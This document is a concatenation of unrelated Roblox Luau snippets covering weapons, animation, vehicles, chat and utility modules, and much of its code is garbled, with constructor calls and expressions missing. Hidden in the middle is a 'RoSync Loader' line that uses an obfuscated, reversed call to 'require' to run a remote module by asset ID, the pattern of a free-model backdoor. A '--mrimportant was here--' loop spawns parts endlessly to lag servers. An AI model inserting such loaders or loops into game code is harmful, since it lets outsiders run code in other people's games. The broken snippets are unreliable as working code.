game.Players:playerFromCharacter(vCharacter) return vCharacter:findFirstChild("Head") end function computeLaunchAngle(dx,dy,grav) -- arcane -- local g = math.abs(grav) local inRoot = (VELOCITY*VELOCITY*VELOCITY*VELOCITY) - (g * ((g*dx*dx) + (2*dy*VELOCITY*VELOCITY))) if inRoot <= 0 then return .25 * math.pi end local root = math.sqrt(inRoot) local inATan1 = ((VELOCITY*VELOCITY) + root) / (g*dx) local inATan2 = ((VELOCITY*VELOCITY) - root) / (g*dx) local answer1 = math.atan(inATan1) local answer2 = math.atan(inATan2) if answer1 < answer2 then return answer1 end return answer2 end function computeDirection(vec) local lenSquared = vec.magnitude * vec.magnitude local invSqrt = 1 / math.sqrt(lenSquared) return * invSqrt, vec.y * invSqrt, vec.z * invSqrt) end Tool.Enabled = true function onActivated() if not Tool.Enabled then return end Tool.Enabled = false local character = Tool.Parent; local humanoid = character.Humanoid if humanoid == nil then print("Humanoid not found") return end local targetPos = humanoid.TargetPoint fire(targetPos) wait(FIRERATE) Tool.Enabled = true end script.Parent.Activated:connect(onActivated)
--[[ Waits for a child to be added with the specified class, or returns one if it exists already. --]]
local function waitForChildOfClassAsync(instance: Instance, className: string) local child = instance:FindFirstChildOfClass(className) while not child do instance.ChildAdded:Wait() child = instance:FindFirstChildOfClass(className) end return child end return waitForChildOfClassAsync
--- Recalculate the window height
function Window:UpdateWindowHeight() local windowHeight = Gui.AbsoluteCanvasSize.Y Gui.Size = Gui.Size.X.Scale, Gui.Size.X.Offset, 0, windowHeight > WINDOW_MAX_HEIGHT and WINDOW_MAX_HEIGHT or windowHeight ) Gui.CanvasPosition =, windowHeight) end
--[[local humanoidf ="Humanoid") humanoidf.Parent = game.Workspace.PlayerModule humanoidf:ApplyDescription(game.Players:GetHumanoidDescriptionFromUserId(player.UserId))]]
script.Parent.Values.Gear.Changed:connect(function() if script.Parent.Values.Gear.Value == -1 then for index, child in pairs(car.Misc.TK.Trunk.Lights.Rev:GetChildren()) do child.Material = Enum.Material.Neon car.DriveSeat.Reverse:Play() end else for index, child in pairs(car.Misc.TK.Trunk.Lights.Rev:GetChildren()) do child.Material = Enum.Material.SmoothPlastic car.DriveSeat.Reverse:Stop() end end end) while wait() do if (car.DriveSeat.Velocity.magnitude/40)+0.300 < 1.3 then car.DriveSeat.Reverse.Pitch = (car.DriveSeat.Velocity.magnitude/40)+0.300 car.DriveSeat.Reverse.Volume = (car.DriveSeat.Velocity.magnitude/150) else car.DriveSeat.Reverse.Pitch = 1.3 car.DriveSeat.Reverse.Volume = .2 end end
--[=[ Sets the value for the parent @param parent Instance @param instanceType string @param name string @param value any @return any ]=]
function ValueBaseUtils.setValue(parent, instanceType, name, value) assert(typeof(parent) == "Instance", "Bad argument 'parent'") assert(type(instanceType) == "string", "Bad argument 'instanceType'") assert(type(name) == "string", "Bad argument 'name'") local foundChild = parent:FindFirstChild(name) if foundChild then if not foundChild:IsA(instanceType) then warn(("[ValueBaseUtils.setValue] - Value of type %q of name %q is of type %q in %s instead") :format(instanceType, name, foundChild.ClassName, foundChild:GetFullName())) end foundChild.Value = value else local newChild = newChild.Name = name newChild.Value = value newChild.Parent = parent end end
-- Requires
local WeaponDefinitonLoader = require(ReplicatedStorage.Common.WeaponDefintionLoader) local PartUtility = require(ReplicatedStorage.Common.PartUtility)
-- @outline // RUNNERS
function Camera.ClientInit() if not System.IsStudio then UIS.MouseBehavior = Enum.MouseBehavior.LockCenter end end function Camera.ClientUpdate(dt : number) if not Camera.Enabled then return end Cam.CameraType = Enum.CameraType.Scriptable Cam.CFrame = Camera:GetCFrame(dt) end return Camera
--WARNING! --DO NOT MODIFY THE CODE BELOW! (Unless you want less than 4 motors. The lines you will need to delete are marked.)
local motor1 = script.Parent.Base1.HingeConstraint --Don't delete this line local display = script.Parent.Display.SurfaceGui.TextLabel local current_mode = 0 function Mode_Up() if current_mode < max_mode then current_mode = current_mode + 1 motor1.AngularVelocity = motor1.AngularVelocity + increment_speed --Don't delete this line display.Text = current_mode end end function Mode_Down() if current_mode > min_mode then current_mode = current_mode - 1 motor1.AngularVelocity = motor1.AngularVelocity - increment_speed --Don't delete this line display.Text = current_mode end end script.Parent.Button_Up.ClickDetector.mouseClick:connect(Mode_Up) script.Parent.Button_Down.ClickDetector.mouseClick:connect(Mode_Down)
------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------
function onRunning(speed) if speed>0 then playAnimation("walk", 0.1, Humanoid) pose = "Running" else playAnimation("idle", 0.1, Humanoid) pose = "Standing" end end function onDied() pose = "Dead" end function onJumping() playAnimation("jump", 0.1, Humanoid) jumpAnimTime = jumpAnimDuration pose = "Jumping" end function onClimbing() playAnimation("climb", 0.1, Humanoid) pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() if (jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) end pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end function onSwimming(speed) if speed>0 then pose = "Running" else pose = "Standing" end end local function getTool() for _, kid in ipairs(Figure:GetChildren()) do if kid.className == "Tool" then return kid end end return nil end local function getToolAnim(tool) for _, c in ipairs(tool:GetChildren()) do if c.Name == "toolanim" and c.className == "StringValue" then return c end end return nil end local function animateTool() if (toolAnim == "None") then playToolAnimation("toolnone", toolTransitionTime, Humanoid) return end if (toolAnim == "Slash") then playToolAnimation("toolslash", 0, Humanoid) return end if (toolAnim == "Lunge") then playToolAnimation("toollunge", 0, Humanoid) return end end local function moveSit() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder:SetDesiredAngle(3.14 /2) LeftShoulder:SetDesiredAngle(-3.14 /2) RightHip:SetDesiredAngle(3.14 /2) LeftHip:SetDesiredAngle(-3.14 /2) end local lastTick = 0 function move(time) local amplitude = 1 local frequency = 1 local deltaTime = time - lastTick lastTick = time local climbFudge = 0 local setAngles = false if (jumpAnimTime > 0) then jumpAnimTime = jumpAnimTime - deltaTime end if (pose == "FreeFall" and jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) elseif (pose == "Seated") then stopAllAnimations() moveSit() return elseif (pose == "Running") then playAnimation("walk", 0.1, Humanoid) elseif (pose == "Dead" or pose == "GettingUp" or pose == "FallingDown" or pose == "Seated" or pose == "PlatformStanding") then
--["Walk"] = "rbxassetid://507777826",
["Walk"] = "", ["Idle"] = "", ["SwingTool"] = "" } local anims = {} for animName,animId in next,preAnims do local anim ="Animation") anim.AnimationId = animId game:GetService("ContentProvider"):PreloadAsync({anim}) anims[animName] = animController:LoadAnimation(anim) end if not anims["Walk"].IsPlaying then anims["Walk"]:Play() end
--[[ Initialization/Setup ]]
-- local function createTouchGuiContainer() if TouchGui then TouchGui:Destroy() end -- Container for all touch device guis TouchGui ='ScreenGui') TouchGui.Name = "TouchGui" TouchGui.ResetOnSpawn = false TouchGui.Parent = PlayerGui TouchControlFrame ='Frame') TouchControlFrame.Name = "TouchControlFrame" TouchControlFrame.Size =, 0, 1, 0) TouchControlFrame.BackgroundTransparency = 1 TouchControlFrame.Parent = TouchGui ThumbstickModule:Create(TouchControlFrame) DPadModule:Create(TouchControlFrame) ThumbpadModule:Create(TouchControlFrame) TouchJumpModule:Create(TouchControlFrame) DynamicThumbstickModule:Create(TouchControlFrame) end
----- water handler -----
while true do if script.Parent.HotOn.Value == true and script.Parent.ColdOn.Value == true and script.Parent.Plugged.Value == true and water.Scale.Y <= 0.6 then -- if BOTH ON and PLUGGED water.Scale = water.Scale +, 0.01, 0) water.Offset =, water.Scale.Y/2, 0) hotWater = hotWater + 1 coldWater = coldWater + 1 drainSound:Stop() elseif (script.Parent.HotOn.Value == true or script.Parent.ColdOn.Value == true) and script.Parent.Plugged.Value == true and water.Scale.Y <= 0.6 then -- if ON and PLUGGED water.Scale = water.Scale +, 0.01, 0) water.Offset =, water.Scale.Y/2, 0) if script.Parent.HotOn.Value == true then hotWater = hotWater + 1 else coldWater = coldWater + 1 end drainSound:Stop() elseif (script.Parent.HotOn.Value == true or script.Parent.ColdOn.Value == true) and script.Parent.Plugged.Value == false and water.Scale.Y <= 0.6 then -- if ON and NOT PLUGGED if script.Parent.HotOn.Value == true then coldWater = coldWater - 1 else hotWater = hotWater - 1 end drainSound:Stop() elseif (script.Parent.HotOn.Value == false and script.Parent.ColdOn.Value == false) and script.Parent.Plugged.Value == false and water.Scale.Y > 0 then -- if NOT ON and NOT PLUGGED water.Scale = water.Scale +, -0.01, 0) water.Offset =, water.Scale.Y/2, 0) coldWater = coldWater - 1 hotWater = hotWater - 1 drainSound.TimePosition = 0 drainSound:Play() end if coldWater < 1 then coldWater = 1 end if hotWater < 1 then hotWater = 1 end waterTemp = hotWater/coldWater if waterTemp > 1 then water.Parent.SteamEmitter.Enabled = true else water.Parent.SteamEmitter.Enabled = false end wait(0.1) if script.Parent.ColdOn.Value == true or script.Parent.HotOn.Value == true then script.Parent.Splash.ParticleEmitter.Enabled = true else script.Parent.Splash.ParticleEmitter.Enabled = false end if water.Scale.Y <= 0 then drainSound:Stop() end end
--Clearing The Blood Function
local deleteBlood = function(part) local tween = tweenSize(part, 0.5, Enum.EasingDirection.In,, 0.1, 0)) spawn(function() tween.Completed:Wait() tween:Destroy() part:Destroy() end) end
--[[ [Horizontal and Vertical limts for head and body tracking.] [Setting to 0 negates tracking, setting to 1 is normal tracking, and setting to anything higher than 1 goes past real life head/body rotation capabilities.] --]]
local HeadHorFactor = 1 local HeadVertFactor = 0.6 local BodyHorFactor = 0.5 local BodyVertFactor = 0.4
function Util.spawner(func, ...) local thread = coroutine.wrap(func) return thread(...) end function Util.readTab(tab) return repr(tab) end
--mrimportant was here--
while true do wait(0.03) local part ="Part", workspace) part.Name = "Roblox generated parts." part.Parent = game.ReplicatedStorage part.Position =,1,1) end
-- For luminance calculation formula look at:
local function IsDark(color) local cieLuminance = 0.2126 * color.r + 0.7152 * color.g + 0.0722 * color.b return cieLuminance < 0.4 end local function LerpColor(startColor, endColor, duration) local startTime = tick() while tick() - startTime < duration do wait(1 / MAX_STEPS) local lerpedVec = startColor:Lerp(endColor, (tick() - startTime) / duration) COLOR =,lerpedVec.y,lerpedVec.z) if lerpedVec.x < 1 and lerpedVec.y < 1 and lerpedVec.z < 1 and lerpedVec.x > 0 and lerpedVec.y > 0 and lerpedVec.z > 0 then script.Parent.Value =,lerpedVec.y,lerpedVec.z) end end end while true do if tick() - t >= 30 then math.randomseed(tick()/2) end t=tick() local newcolor repeat newcolor = BrickColor.Random() until not IsDark(newcolor.Color) print(newcolor) LerpColor(,COLOR.g,COLOR.b),,newcolor.Color.g,newcolor.Color.b),2) end
--// This section of code waits until all of the necessary RemoteEvents are found in EventFolder. --// I have to do some weird stuff since people could potentially already have pre-existing --// things in a folder with the same name, and they may have different class types. --// I do the useEvents thing and set EventFolder to useEvents so I can have a pseudo folder that --// the rest of the code can interface with and have the guarantee that the RemoteEvents they want --// exist with their desired names.
local FFlagFixChatWindowHoverOver = false do local ok, value = pcall(function() return UserSettings():IsUserFeatureEnabled("UserFixChatWindowHoverOver") end) if ok then FFlagFixChatWindowHoverOver = value end end local FFlagFixMouseCapture = false do local ok, value = pcall(function() return UserSettings():IsUserFeatureEnabled("UserFixMouseCapture") end) if ok then FFlagFixMouseCapture = value end end local FFlagUserHandleChatHotKeyWithContextActionService = false do local ok, value = pcall(function() return UserSettings():IsUserFeatureEnabled("UserHandleChatHotKeyWithContextActionService") end) if ok then FFlagUserHandleChatHotKeyWithContextActionService = value end end local FILTER_MESSAGE_TIMEOUT = 60 local RunService = game:GetService("RunService") local ReplicatedStorage = game:GetService("ReplicatedStorage") local Chat = game:GetService("Chat") local StarterGui = game:GetService("StarterGui") local ContextActionService = game:GetService("ContextActionService") local DefaultChatSystemChatEvents = ReplicatedStorage:WaitForChild("DefaultChatSystemChatEvents") local EventFolder = ReplicatedStorage:WaitForChild("DefaultChatSystemChatEvents") local clientChatModules = Chat:WaitForChild("ClientChatModules") local ChatConstants = require(clientChatModules:WaitForChild("ChatConstants")) local ChatSettings = require(clientChatModules:WaitForChild("ChatSettings")) local messageCreatorModules = clientChatModules:WaitForChild("MessageCreatorModules") local MessageCreatorUtil = require(messageCreatorModules:WaitForChild("Util")) local ChatLocalization = nil pcall(function() ChatLocalization = require(game:GetService("Chat").ClientChatModules.ChatLocalization :: any) end) if ChatLocalization == nil then ChatLocalization = {} function ChatLocalization:Get(key,default) return default end end local numChildrenRemaining = 10 -- #waitChildren returns 0 because it's a dictionary local waitChildren = { OnNewMessage = "RemoteEvent", OnMessageDoneFiltering = "RemoteEvent", OnNewSystemMessage = "RemoteEvent", OnChannelJoined = "RemoteEvent", OnChannelLeft = "RemoteEvent", OnMuted = "RemoteEvent", OnUnmuted = "RemoteEvent", OnMainChannelSet = "RemoteEvent", SayMessageRequest = "RemoteEvent", GetInitDataRequest = "RemoteFunction", }
--[[ Last synced 8/18/2021 08:03 RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722905184) --[[ ]]-- --[[ Last synced 8/18/2021 08:06 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722905184) --[[ ]]--
--[=[ Allows access to an attribute like a ValueObject. ```lua local attributeValue =, "Version", "1.0.0") print(attributeValue.Value) --> 1.0.0 print(workspace:GetAttribute("version")) --> 1.0.0 attributeValue.Changed:Connect(function() print(attributeValue.Value) end) workspace:SetAttribute("1.1.0") --> 1.1.0 attributeValue.Value = "1.2.0" --> 1.2.0 ``` @class AttributeValue ]=]
local require = require(script.Parent.loader).load(script) local RxAttributeUtils = require("RxAttributeUtils") local AttributeValue = {} AttributeValue.ClassName = "AttributeValue" AttributeValue.__index = AttributeValue
--[[ [MAKING WAYPOINTS] Basically you duplicate the point and put it anywhere in your maze but accept safehouses[if you have any] and points that are out of the maze. Now once you're done reading this just delete this script. If you leave it, it really won't do anything at all. ]]
-- Credit:
local function updateAll(root: PubTypes.Dependency) local counters: {[Descendant]: number} = {} local flags: {[Descendant]: boolean} = {} local queue: {Descendant} = {} local queueSize = 0 local queuePos = 1 for object in root.dependentSet do queueSize += 1 queue[queueSize] = object flags[object] = true end -- Pass 1: counting up while queuePos <= queueSize do local next = queue[queuePos] local counter = counters[next] counters[next] = if counter == nil then 1 else counter + 1 print(counter) if (next :: any).dependentSet ~= nil then for object in (next :: any).dependentSet do queueSize += 1 queue[queueSize] = object end end queuePos += 1 end -- Pass 2: counting down + processing queuePos = 1 while queuePos <= queueSize do local next = queue[queuePos] counters[next] -= 1 if counters[next] == 0 and flags[next] and next:update() and (next :: any).dependentSet ~= nil then for object in (next :: any).dependentSet do flags[object] = true end end queuePos += 1 end end return updateAll
UIS.InputBegan:connect(function(i,GP) if not GP then if i.KeyCode == Enum.KeyCode.A then REvent:FireServer("A",true) end if i.KeyCode == Enum.KeyCode.D then REvent:FireServer("D",true) end if i.KeyCode == Enum.KeyCode.W then REvent:FireServer("W",true) end if i.KeyCode == Enum.KeyCode.S then REvent:FireServer("S",true) end if i.KeyCode == Enum.KeyCode.E then REvent:FireServer("E",true) end if i.KeyCode == Enum.KeyCode.Q then REvent:FireServer("Q",true) end end end) UIS.InputEnded:connect(function(i,GP) if not GP then if i.KeyCode == Enum.KeyCode.A then REvent:FireServer("A",false) end if i.KeyCode == Enum.KeyCode.D then REvent:FireServer("D",false) end if i.KeyCode == Enum.KeyCode.W then REvent:FireServer("W",false) end if i.KeyCode == Enum.KeyCode.S then REvent:FireServer("S",false) end if i.KeyCode == Enum.KeyCode.E then REvent:FireServer("E",false) end if i.KeyCode == Enum.KeyCode.Q then REvent:FireServer("Q",false) end end end) spawn(function() while wait() do if Player.Character.Humanoid.Sit == false then local t={"A","D","W","S","E","Q"} for i,v in pairs(t) do REvent:FireServer(v,false) end script:Destroy() end end end)
Distribute = function(NPC) if NPC:IsA("Model") then if script:FindFirstChild(NPC.Name.."Behavior") then local CloneScript = script:FindFirstChild(NPC.Name.."Behavior"):Clone() CloneScript.Parent = NPC CloneScript.Enabled = true end end end
--------------------[ GUI SETUP FUNCTION ]--------------------------------------------
function ConvertKey(Key) if Key == string.char(8) then return "BKSPCE" elseif Key == string.char(9) then return "TAB" elseif Key == string.char(13) then return "ENTER" elseif Key == string.char(17) then return "UP" elseif Key == string.char(18) then return "DOWN" elseif Key == string.char(19) then return "RIGHT" elseif Key == string.char(20) then return "LEFT" elseif Key == string.char(22) then return "HOME" elseif Key == string.char(23) then return "END" elseif Key == string.char(27) then return "F2" elseif Key == string.char(29) then return "F4" elseif Key == string.char(30) then return "F5" elseif Key == string.char(32) or Key == " " then return "F7" elseif Key == string.char(33) or Key == "!" then return "F8" elseif Key == string.char(34) or Key == '"' then return "F9" elseif Key == string.char(35) or Key == "#" then return "F10" elseif Key == string.char(37) or Key == "%" then return "F12" elseif Key == string.char(47) or Key == "/" then return "R-SHIFT" elseif Key == string.char(48) or Key == "0" then return "L-SHIFT" elseif Key == string.char(49) or Key == "1" then return "R-CTRL" elseif Key == string.char(50) or Key == "2" then return "L-CTRL" elseif Key == string.char(51) or Key == "3" then return "R-ALT" elseif Key == string.char(52) or Key == "4" then return "L-ALT" else return string.upper(Key) end end function CreateControlFrame(Key, Desc, Num) local Controls = Gui_Clone:WaitForChild("HUD"):WaitForChild("Controls") local C ="Frame") C.BackgroundTransparency = ((Num % 2) == 1 and 0.7 or 1) C.BorderSizePixel = 0 C.Name = "C"..Num C.Position =, 0, 0, Num * 20) C.Size =, 0, 0, 20) local K ="TextLabel") K.BackgroundTransparency = 1 K.Name = "Key" K.Size =, 45, 1, 0) K.Font = Enum.Font.ArialBold K.FontSize = Enum.FontSize.Size14 K.Text = Key K.TextColor3 =, 1, 1) K.TextScaled = (string.len(Key) > 5) K.TextWrapped = (string.len(Key) > 5) K.Parent = C local D ="TextLabel") D.BackgroundTransparency = 1 D.Name = "Desc" D.Position =, 50, 0, 0) D.Size =, -50, 1, 0) D.Font = Enum.Font.ArialBold D.FontSize = Enum.FontSize.Size14 D.Text = "- "..Desc D.TextColor3 =, 1, 1) D.TextXAlignment = Enum.TextXAlignment.Left D.Parent = C C.Parent = Controls end function SetUpGui() local HUD = Gui_Clone:WaitForChild("HUD") local Scope = Gui_Clone:WaitForChild("Scope") local Grenades = HUD:WaitForChild("Grenades") local Controls = HUD:WaitForChild("Controls") local CurrentNum = 1 if S.CanChangeStance then local Dive = (S.DolphinDive and " / Dive" or "") CreateControlFrame(ConvertKey(S.LowerStanceKey), "Lower Stance"..Dive, CurrentNum) CurrentNum = CurrentNum + 1 CreateControlFrame(ConvertKey(S.RaiseStanceKey), "Raise Stance", CurrentNum) CurrentNum = CurrentNum + 1 end CreateControlFrame(ConvertKey(S.ReloadKey), "Reload", CurrentNum) CurrentNum = CurrentNum + 1 if S.CanKnife then CreateControlFrame(ConvertKey(S.KnifeKey), "Knife", CurrentNum) CurrentNum = CurrentNum + 1 end if S.Throwables then CreateControlFrame(ConvertKey(S.LethalGrenadeKey), "Throw Lethal", CurrentNum) CurrentNum = CurrentNum + 1 CreateControlFrame(ConvertKey(S.TacticalGrenadeKey), "Throw Tactical", CurrentNum) CurrentNum = CurrentNum + 1 else Grenades.Visible = false HUD.Position =, -200, 1, -100) HUD.Size =, 175, 0, 50) end CreateControlFrame(ConvertKey(S.SprintKey), "Sprint", CurrentNum) CurrentNum = CurrentNum + 1 if S.ADSKey ~= "" then local Hold = (S.HoldMouseOrKeyToADS and "HOLD " or "") CreateControlFrame(Hold..ConvertKey(S.ADSKey).." OR R-MOUSE", "Aim Down Sights", CurrentNum) CurrentNum = CurrentNum + 1 end Controls.Size =, 0, 0, CurrentNum * 20) Controls.Position =, 0, 0, -(CurrentNum * 20) - 80) if S.GuiScope then Scope:WaitForChild("Img").Image = S.GuiId Scope:WaitForChild("Steady").Text = "Hold "..ConvertKey(S.ScopeSteadyKey).." to Steady" end if HUD:FindFirstChild("Co") then HUD.Co:Destroy() end local Co ="TextLabel") Co.BackgroundTransparency = 1 Co.Name = "Co" Co.Position =, 0, 1, 5) Co.Size =, 0, 0, 20) Co.Font = Enum.Font.ArialBold Co.FontSize = Enum.FontSize.Size14 Co.Text = ("noisuFobruT yb detpircs tiK nuG"):reverse() Co.TextColor3 =, 1, 0) Co.TextStrokeTransparency = 0 Co.TextXAlignment = Enum.TextXAlignment.Right Co.Parent = HUD HUD:WaitForChild("Grenades"):WaitForChild("Lethals"):WaitForChild("Icon").Image = LethalIcons[S.LethalGrenadeType] HUD:WaitForChild("Grenades"):WaitForChild("Tacticals"):WaitForChild("Icon").Image = TacticalIcons[S.TacticalGrenadeType] end
--Equip Handler
Weapons = { [Enum.KeyCode.One] = script.Parent.Primary, [Enum.KeyCode.Two] = script.Parent.Secondary, [Enum.KeyCode.Three] = script.Parent.Melee } Selected = script.Parent.Primary function Select(Weapon) Weapon:TweenSize(,0,0.1,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,0.1,true) end function Deselect(Weapon) Weapon:TweenSize(,0,0.1,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,0.1,true) end UIS.InputBegan:Connect(function(input) local Key = Weapons[input.KeyCode] if Key then Deselect(Selected) Selected = Key Select(Selected) end end)
--Torque Curve Tune.Horsepower = 330 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 700 -- Tune.PeakRPM = 6000 -- Use sliders to manipulate values Tune.Redline = 6700 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 5500 Tune.PeakSharpness = 7.5 Tune.CurveMult = 0.16 --Incline Compensation Tune.InclineComp = 4.7 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 150 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 500 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
-- services
local ServerScriptService = game:GetService("ServerScriptService") local ReplicatedStorage = game:GetService("ReplicatedStorage") local TextService = game:GetService("TextService") local Chat = game:GetService("Chat") local Players = game:GetService("Players")
playerService.PlayerAdded:Connect(function(player) player.CharacterAdded:Connect(function(character) local rootPart = character:WaitForChild("HumanoidRootPart") local humanoid = character:WaitForChild("Humanoid") local oldHealth = humanoid.Health local particlesClone = bloodParticles:Clone() particlesClone.Parent = rootPart humanoid.HealthChanged:Connect(function(health) if health < oldHealth then oldHealth = health spawn(function() for i = 1, blood_part_per_hit do local randomPosition = math.random(-20, 20) / 10 local raycastOrigin = rootPart.Position +, 0, randomPosition) local raycastDirection =, -8, 0) local raycastResult = raycast(character, raycastOrigin, raycastDirection) if raycastResult then particlesClone:Emit(2) delay(0.5, function() local newBlood = createBlood(raycastResult.Position) expandBlood(newBlood) delay(blood_destroy_delay, function() deleteBlood(newBlood) end) end) end wait(math.random(0.5, 2) / 10) end end) else oldHealth = health end end) end) end)
--[[function playsound(time) nextsound=time+5+(math.random()*5) local randomsound=sounds[math.random(1,#sounds)] randomsound.Volume=.5+(.5*math.random()) randomsound.Pitch=.5+(.5*math.random()) randomsound:Play() end]]
while sp.Parent~=nil and Humanoid and Humanoid.Parent~=nil and Humanoid.Health>0 and Torso and Head and Torso~=nil and Torso.Parent~=nil do local _,time=wait(0.25)--wait(1/3) humanoids={} populatehumanoids(game.Workspace) closesttarget=nil closestdist=sightrange local creator=sp:FindFirstChild("creator") for i,h in ipairs(humanoids) do if h and h.Parent~=nil then if h.Health>0 and h.Parent~=sp then local plr=game.Players:GetPlayerFromCharacter(h.Parent) if creator==nil or plr==nil or creator.Value~=plr then local t=h.Parent:FindFirstChild("Torso") if t~=nil then local dist=(t.Position-Torso.Position).magnitude if dist<closestdist then closestdist=dist closesttarget=t end end end end end end if closesttarget~=nil then if not chasing then --playsound(time) chasing=true Humanoid.WalkSpeed=runspeed BARKING:Play() end Humanoid:MoveTo(closesttarget.Position+(,1,1)*(variance*((math.random()*2)-1))),closesttarget) if math.random()<.5 then attack(time,closesttarget.Position) end else if chasing then chasing=false Humanoid.WalkSpeed=wonderspeed BARKING:Stop() end if time>nextrandom then nextrandom=time+3+(math.random()*5) local randompos=Torso.Position+((,1,1)*math.random(),.5,.5))*40) Humanoid:MoveTo(randompos,game.Workspace.Terrain) end end if time>nextsound then --playsound(time) end if time>nextjump then nextjump=time+7+(math.random()*5) Humanoid.Jump=true end animate(time) end wait(4) sp:remove() --Rest In Pizza
-- regeneration
while true do local s = wait(3) local health = Humanoid.Health if health > 0 and health < Humanoid.MaxHealth then health = health + 0.01 * s * Humanoid.MaxHealth if health * 1.05 < Humanoid.MaxHealth then Humanoid.Health = health else Humanoid.Health = Humanoid.MaxHealth end end end
--| Cooldown Value|--
local Cooldown = script.Parent.Parent.CooldownValue
--[[* * Keeps track of the current batch's configuration such as how long an update * should suspend for if it needs to. ]]
local ReactCurrentBatchConfig = { transition = 0, } return ReactCurrentBatchConfig
------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------
function onRunning(speed) if speed > 0.01 then local scale = 15.0 playAnimation("walk", 0.0, Humanoid) setAnimationSpeed(speed / scale) pose = "Running" else playAnimation("idle", 0.1, Humanoid) pose = "Standing" end end function onDied() pose = "Dead" end function onJumping() playAnimation("jump", 0.1, Humanoid) jumpAnimTime = jumpAnimDuration pose = "Jumping" end function onClimbing(speed) local scale = 5.0 playAnimation("climb", 0.1, Humanoid) setAnimationSpeed(speed / scale) pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() if (jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) end pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end function onSwimming(speed) if speed > 1.00 then local scale = 10.0 playAnimation("swim", 0.4, Humanoid) setAnimationSpeed(speed / scale) pose = "Swimming" else playAnimation("swimidle", 0.4, Humanoid) pose = "Standing" end end function getTool() for _, kid in ipairs(Figure:GetChildren()) do if kid.className == "Tool" then return kid end end return nil end function getToolAnim(tool) for _, c in ipairs(tool:GetChildren()) do if c.Name == "toolanim" and c.className == "StringValue" then return c end end return nil end function animateTool() if (toolAnim == "None") then playToolAnimation("toolnone", toolTransitionTime, Humanoid) return end if (toolAnim == "Slash") then playToolAnimation("toolslash", 0, Humanoid) return end if (toolAnim == "Lunge") then playToolAnimation("toollunge", 0, Humanoid) return end end function moveSit() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder:SetDesiredAngle(3.14 /2) LeftShoulder:SetDesiredAngle(-3.14 /2) RightHip:SetDesiredAngle(3.14 /2) LeftHip:SetDesiredAngle(-3.14 /2) end local lastTick = 0 function move(time) local amplitude = 1 local frequency = 1 local deltaTime = time - lastTick lastTick = time local climbFudge = 0 local setAngles = false if (jumpAnimTime > 0) then jumpAnimTime = jumpAnimTime - deltaTime end if (pose == "FreeFall" and jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) elseif (pose == "Seated") then playAnimation("sit", 0.5, Humanoid) return elseif (pose == "Running") then playAnimation("walk", 0.1, Humanoid) elseif (pose == "Dead" or pose == "GettingUp" or pose == "FallingDown" or pose == "Seated" or pose == "PlatformStanding") then stopAllAnimations() amplitude = 0.1 frequency = 1 setAngles = true end -- Tool Animation handling local tool = getTool() if tool then animStringValueObject = getToolAnim(tool) if animStringValueObject then toolAnim = animStringValueObject.Value -- message recieved, delete StringValue animStringValueObject.Parent = nil toolAnimTime = time + .3 end if time > toolAnimTime then toolAnimTime = 0 toolAnim = "None" end animateTool() else stopToolAnimations() toolAnim = "None" toolAnimInstance = nil toolAnimTime = 0 end end
-- Trove -- Stephen Leitnick -- October 16, 2021
local FN_MARKER = newproxy() local RunService = game:GetService("RunService") local function GetObjectCleanupFunction(object, cleanupMethod) local t = typeof(object) if t == "function" then return FN_MARKER end if cleanupMethod then return cleanupMethod end if t == "Instance" then return "Destroy" elseif t == "RBXScriptConnection" then return "Disconnect" elseif t == "table" then if typeof(object.Destroy) == "function" then return "Destroy" elseif typeof(object.Disconnect) == "function" then return "Disconnect" end end error("Failed to get cleanup function for object " .. t .. ": " .. tostring(object)) end
--Fixed by Busify --If you're still not happy with how it works then scroll down and change the wait sections. --If you can't find any wait sections then press Ctrl + F and look for wait. --Hope I helped! Enjoy!
Tool = script.Parent Handle = Tool:WaitForChild("Handle") function Create(ty) return function(data) local obj = for k, v in pairs(data) do if type(k) == 'number' then v.Parent = obj else obj[k] = v end end return obj end end local BaseUrl = "rbxassetid://" Players = game:GetService("Players") Debris = game:GetService("Debris") RunService = game:GetService("RunService") DamageValues = { BaseDamage = 7, SlashDamage = 8, LungeDamage = 9 }
--[=[ Executes all promises. If any fails, the result will be rejected. However, it yields until every promise is complete. :::warning Passing in a spare array (i.e. {nil, promise}) will result in undefined behavior here. ::: @param promises { Promise<T> } @return Promise<T> ]=]
function PromiseUtils.all(promises) if #promises == 0 then return Promise.resolved() elseif #promises == 1 then return promises[1] end local remainingCount = #promises local returnPromise = local results = {} local allFulfilled = true local function syncronize(index, isFullfilled) return function(value) allFulfilled = allFulfilled and isFullfilled results[index] = value remainingCount = remainingCount - 1 if remainingCount == 0 then local method = allFulfilled and "Resolve" or "Reject" returnPromise[method](returnPromise, unpack(results, 1, #promises)) end end end for index, promise in pairs(promises) do promise:Then(syncronize(index, true), syncronize(index, false)) end return returnPromise end
